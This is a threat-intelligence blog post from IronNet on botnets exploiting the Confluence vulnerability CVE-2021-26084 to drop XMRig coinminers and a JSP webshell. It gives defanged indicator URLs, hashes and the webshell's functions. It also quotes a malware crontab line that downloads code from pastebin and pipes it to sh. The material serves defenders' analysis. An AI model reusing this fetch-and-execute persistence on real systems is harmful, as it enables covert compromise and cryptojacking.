# Continued Exploitation of CVE-2021-26084 **[ironnet.com/blog/continued-exploitation-of-cve-2021-26084](https://www.ironnet.com/blog/continued-exploitation-of-cve-2021-26084)** On August 25, Atlassian publicly released a patch for a critical remote code execution [vulnerability in its popular corporate wiki solution Confluence. Just days later, a proof of](https://www.atlassian.com/software/confluence) concept (POC) code demonstrating how to exploit this CVE was published to GitHub. As expected, threat actors rapidly began exploiting publicly facing Confluence servers. As early ----- as September 1, IronNet s threat hunters observed active exploitation of Confluence servers where cryptocurrency miners and webshells were dropped by what appeared to be multiple distinct threat actors. Similar activity has been observed and documented by other security organizations. ## Coinminers [Like Trend Micro [1] noted in a recent blog post, threat actors dropping the cryptominer,](https://www.trendmicro.com/pt_br/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html) z0miner, were quick to jump on this vulnerability and have been observed broadly targeting vulnerable internet facing servers. IronNet observed similar IOCs to what was reported, in some cases exact matches. ``` hxxp://172.96.249.219:88/.jpg hxxp://209.141.50.210/syna hxxp://27.1.1.34:8080/docs/s/26084.txt hxxp://27.1.1.34:8080/docs/s/asd.txt hxxp://27.1.1.34:8080/docs/s/conf.txt hxxp://27.1.1.34:8080/docs/s/kill.sh ### Botnets pushing XMRig ``` IronNet observed what appeared to be a number of different botnets, in some cases pushing the same shell script but always ultimately leading to a XMRig coinminer. This was confirmed by taking the hash of both of the files and searching in VirusTotal: ``` hxxp://m.windowsupdatesupport.org/d/loader.sh hxxp://185.186.246.24/d/loader.sh?con $ md5sum loader.sh d1e6782be9c399dc6fcf591bf6330e9b loader.sh $ md5sum loader.sh-con d1e6782be9c399dc6fcf591bf6330e9b loader.sh-con ``` The shell script first tries to disable security processes and protection mechanisms like selinux and apparmor. It will grab its second stage payload via curl or wget if its not available using the below command: _Figure 1: Second stage payload request_ Request: ----- User-Agent `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36` ``` 3 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64 ``` URL `hxxp://m.windowsupdatesupport.org/d/kworkers` This returns the XMRig UPX packed executable and saves it with a filename of `kworkers .` ``` $ md5sum kworkers 9d294620989e33bb3ed4b3ca7e381cc0 kworkers ``` We observed a suspected second botnet pushing a different shell script that also eventually drops a XMRig coinminer: ``` hxxp://222.117.104.59:8090/about/javaget.txt ``` Besides killing security processes, this script also attempts to kill other processes that may indicate cohabitation by other threat actors. After those commands are executed, a simple persistence method via crontab is established and executes shell code downloaded from pastebin every five seconds: _Figure 2: Persistence via Crontab_ ``` crontab -l | grep -e "D4EiwzQX" | grep -v grep if [ $? -eq 0 ]; then echo "cron good" else ( crontab -r crontab -l 2>/dev/null echo "*/5 * * * * wget -q hxxps://pastebin.com/raw/D4EiwzQX -O- | sh" ) | crontab fi ``` Finally, the script will pull down four files: ``` hxxp://222.117.104.59:8090/about/config.json hxxp://222.117.104.59:8090/about/kill.sh hxxp://222.117.104.59:8090/about/solr.sh hxxp://222.122.47.27:2143/auth/solrd.exe config.json → XMRig config kill.sh → Shell script to kill its processes solr.sh → Shell script to kill off other malware processes running. solrd.exe → XMRig coinminer ``` ----- Lastly, we also observed the Sysrv-Hello Botnet pushing a different shell script that ultimately leads to a XMRig coinminer with a similar operation to what was outlined above. In this case, however, the script sets its C2 in the beginning: ``` cc=hxxp://194.145.227.21 ``` And pulls down the corresponding compatible binary based on the architecture of the system: _Figure 3: Second stage payload request_ Surprise surprise, another XMRig UPX packed executable: ``` $ md5sum sys.x86_64 b0ecaadb4da7c861f3400c6b03ed481b sys.x86_64 ``` Notably, this shell script contains a lateral movement component that leverages the host's SSH config to spread. This type of SSH worming capability is fairly standard and can be found in many commodity malware samples. _Figure 4: Lateral Movement component_ ## Webshell The webshell used in this attack was a .jsp file, or Jakarta Server Pages, which allows developers to dynamically generate HTML web pages in Java. This makes sense since Confluence is based in Java, making the execution of .jsp files possible without having to add any further software to the server. After searching Google for some of the unique-looking strings and comments, it is fairly easy to find example source code on GitHub. The webshell ----- observed by IronNet hunters is largely the same as the webshells found below, with small variations like an updated password for authentication among other minor changes. An interesting change we did observe was that the original webshell contains bug links that lead to shack2[.]org, most likely added by the developers of the original shell as this appears to be their group name, and in this case the threat actors have replaced those links with links to a website hosting adult content. https://github.com/ysrc/webshellsample/blob/master/jsp/013f24efa637d00962abc741457f51a4ee64354c.jsp [https://github.com/xl7dev/WebShell/blob/master/Jsp/SJavaWebManageV1.4.jsp](https://github.com/xl7dev/WebShell/blob/master/Jsp/SJavaWebManageV1.4.jsp) **Webshell functionality:** Below is a breakdown of the functionality of this webshell along with a brief description of the notable functions. Interestingly, some of the functions have no functionality. Referencing the suspected developers GitHub page, it appears as if some of the modules for the missing [functionality are present: https://github.com/shack2. Functions can be omitted in malware for](https://github.com/shack2) a variety of reasons, but in this case, the threat actor may have only needed limited functionality and wanted to ensure the webshell payload was lightweight. **Function Name** **Function Description** EnvsInfo 环境信息 FileManage 文件管理 CMDS 命令执行 Database Management 数据库管理 Port Scan 端口扫描 Displays information about the environment File manager ability to add / delete / download files Ability to pass bash commands on the server Placeholder function / No functionality Placeholder function / No functionality ----- Brute Force 暴力破解 Rebound Control 反弹控制 Remote File Download 远程文件下载 Remote Control 远程控制 Help 帮助 Renew 更新 Bug Feedback bug反馈 Quit 退出 Placeholder function / No functionality Placeholder function / No functionality Placeholder function / No functionality Placeholder function / No functionality Links to adult content website Links to adult content website Links to adult content website Placeholder function / No functionality This exact version of the webshell is relatively new and was first submitted to VirusTotal on 9/8/2021 and interestingly appears to have been submitted out of Hong Kong via a web browser. The webshell was also detected by 2 YARA rules from Florian Roth’s THOR APT Scanner. ``` MD5: 25ee4001eb4e91f7ea0bc5d07f2a9744 SHA256: fcb1ee9c2c0ee0c8afd4324e5958a203481ea201ff1fb573de6e6d6a9e0752da ``` Rules: ----- [https://valhalla.nextron-systems.com/info/rule/APT_CN_JSP_Shack2_Webshell_Apr20_1](https://valhalla.nextron-systems.com/info/rule/APT_CN_JSP_Shack2_Webshell_Apr20_1) [https://github.com/Neo23x0/signature-base/search?q=webshell_jsp_generic](https://github.com/Neo23x0/signature-base/search?q=webshell_jsp_generic) ## Conclusion The techniques and malware used in these attacks are nothing new or particularly sophisticated; however, this activity is thought-provoking nonetheless. Firstly, this case exemplifies a trend that has been going on for years. Specifically, threat actors - including botnet developers/controllers - are rapidly integrating exploits for known CVEs into their spreading capabilities. Multiple times this year alone, defenders have had a few days (at best) between when a vulnerability is made public and when a POC is made available on GitHub and integrated into botnet and APT toolkits alike. This only further highlights the need for prompt patching programs by administrators, especially for internet-facing servers. An additional trend that has been observed throughout 2021 is a shift away from compromising individual users as a means of access for threats and a renewed focus on server exploitation. This is an obvious example of that shift in tactics. Although the activity observed by IronNet was largely limited to automated exploitation by botnets with what appeared to be financial motivations, we have strong confidence that this exploit is being used by more sophisticated threat actors with intelligence collection in mind. ----- Given the nature of Confluence servers and the type of detailed, sensitive documentation that is commonly stored on them, this is exactly the type of exploit that an APT would leverage. ## Source [1] https://www.trendmicro.com/pt_br/research/21/i/cryptominer-z0miner-uses-newlydiscovered-vulnerability-cve-2021.html About Ironnet Founded in 2014 by GEN (Ret.) Keith Alexander, IronNet, Inc. (NYSE: IRNT) is a global cybersecurity leader that is transforming how organizations secure their networks by delivering the first-ever Collective Defense platform operating at scale. Employing a number of former NSA cybersecurity operators with offensive and defensive cyber experience, IronNet integrates deep tradecraft knowledge into its industry-leading products to solve the most challenging cyber problems facing the world today. -----